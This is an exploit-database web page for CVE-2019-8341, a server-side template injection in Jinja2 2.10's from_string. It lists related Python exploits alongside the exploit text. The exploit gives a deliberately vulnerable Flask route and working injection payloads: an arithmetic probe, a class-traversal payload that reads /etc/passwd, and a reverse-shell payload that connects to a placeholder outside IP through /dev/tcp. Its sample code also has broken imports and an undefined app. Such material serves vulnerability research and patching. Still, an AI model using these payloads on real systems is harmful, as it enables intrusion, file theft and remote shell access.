Menu

Improved exploit search engine. Try it out

"Jinja2 2.10 - 'from_string' Server Side Template Injection"

Author

JameelNabbo

Platform

python

Release date

2019-02-15

Release Date Title Type Platform Author
2019-04-03 "PhreeBooks ERP 5.2.3 - Remote Command Execution" remote python "Metin Yunus Kandemir"
2019-02-15 "Jinja2 2.10 - 'from_string' Server Side Template Injection" webapps python JameelNabbo
2019-01-07 "Mailcleaner - Authenticated Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2017-10-18 "Check_MK 1.2.8p25 - Information Disclosure" webapps python "Julien Ahrens"
2016-11-21 "Mezzanine 4.2.0 - Cross-Site Scripting" webapps python "Curesec Research Team"
2016-07-20 "Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting" webapps python Vulnerability-Lab
2016-05-16 "Web2py 2.14.5 - Multiple Vulnerabilities" webapps python "Narendra Bhati"
2014-05-23 "Pyplate - 'addScript.py' Cross-Site Request Forgery" webapps python "Henri Salo"
2013-07-31 "Plone - 'in_portal.py' < 4.1.3 Session Hijacking" webapps python "Cyrill Bannwart"
2015-10-07 "Zope Management Interface 4.3.7 - Cross-Site Request Forgery" webapps python hyp3rlinx
2017-09-11 "Docker Daemon - Unprotected TCP Socket (Metasploit)" remote python Metasploit
2017-08-31 "Git < 2.7.5 - Command Injection (Metasploit)" remote python Metasploit
2017-06-26 "Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2017-06-07 "DC/OS Marathon UI - Docker (Metasploit)" remote python Metasploit
2017-05-09 "Crypttech CryptoLog - Remote Code Execution (Metasploit)" remote python "Mehmet Ince"
2017-04-27 "Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)" remote python Metasploit
2017-03-24 "Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)" remote python "Mehmet Ince"
2016-07-27 "Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)" remote python Metasploit
2015-08-18 "Werkzeug - Debug Shell Command Execution (Metasploit)" remote python Metasploit
Release Date Title Type Platform Author
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-15 "Jinja2 2.10 - 'from_string' Server Side Template Injection" webapps python JameelNabbo
2018-02-16 "Twig < 2.4.4 - Server Side Template Injection" webapps php JameelNabbo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46386/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46386/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46386/40853/jinja2-210-from-string-server-side-template-injection/download/", "exploit_id": "46386", "exploit_description": "\"Jinja2 2.10 - 'from_string' Server Side Template Injection\"", "exploit_date": "2019-02-15", "exploit_author": "JameelNabbo", "exploit_type": "webapps", "exploit_platform": "python", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
'''
# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341


// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.


//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:
'''

import Flask
import request
import Jinja2


@app.route("/")
def index():
            username = request.values.get('username')
            return Jinja2.from_string('Hello ' + username).render()


if __name__ == "__main__":
            app.run(host='127.0.0.1' , port=4444)

'''
POC
//Exploiting the username param
http://localhost:4444/?username={{4*4}}
OUTPUT: Hello 16

Reading the /etc/passwd

http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}


Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}


How to prevent it:
Never let the user provide template content.
'''